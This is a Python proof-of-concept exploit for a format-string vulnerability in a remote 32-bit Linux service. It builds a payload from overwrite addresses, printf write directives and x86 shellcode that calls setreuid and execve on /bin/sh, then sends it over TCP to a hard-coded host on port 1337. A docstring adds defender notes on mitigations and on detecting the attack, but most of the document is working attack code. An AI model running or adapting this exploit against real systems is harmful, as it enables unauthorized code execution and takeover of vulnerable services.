"""Proof-of-concept client for a format-string bug in a remote 32-bit service.

Payload layout, in the order the bytes are sent:
  1. two little-endian 32-bit addresses, ``overwrite`` and ``overwrite + 2``
  2. the text returned by ``format_string(7, shellcode_add)``
  3. raw x86 machine code

NOTE(review): ``format_string`` is a local helper that is not shown here.
Presumably it emits printf conversion directives that write ``shellcode_add``
as two 16-bit halves through argument position 7; confirm against the helper.

Defender notes:
  * Both addresses are hard-coded. 0x08049e58 sits in the range used by a
    non-PIE 32-bit ELF image and 0xbffff86c in the classic 32-bit Linux
    stack range, so the script only works where the target has a fixed
    layout and an executable stack. PIE with ASLR, a non-executable stack
    and full RELRO each break one of those assumptions.
  * The root cause on the server side is attacker-controlled data used as a
    format argument. Fix it with ``printf("%s", buf)`` instead of
    ``printf(buf)``, build with ``-Wformat -Wformat-security``, and enable
    ``_FORTIFY_SOURCE=2`` so glibc aborts on ``%n`` in a writable format
    string.
  * For detection, inbound data that starts with binary address bytes and
    then carries ``%`` conversion directives is a strong signal.
"""
from format_string import format_string
from struct import pack
import socket

# Address the write is aimed at. Presumably a writable function-pointer slot
# in the target binary; the page does not say which one.
overwrite = 0x08049e58

# Value to be stored there: where the author expects the machine code below
# to sit in the target's memory (derived by hand, per the original comment).
shellcode_add = 0xbffff86c

# 32-bit x86 Linux machine code. Read by hand, it issues int 0x80 with
# syscall numbers 0x31 (geteuid), 0x46 (setreuid) and 0x0b (execve), the last
# on the string "//bin/sh".
shellcode = (
    b"\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80"
    b"\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3"
    b"\x89\xd1\xcd\x80"
)

# The order of the pieces is significant: addresses, directives, code.
payload = b"".join([
    pack('<II', overwrite, overwrite + 2),
    format_string(7, shellcode_add).encode(),
    shellcode,
])
print(payload, len(payload))

# Deliver the payload over a plain TCP connection.
host = "warr.dyndns.biz"
port = 1337
sock = socket.socket()
sock.connect((host, port))
sock.send(payload)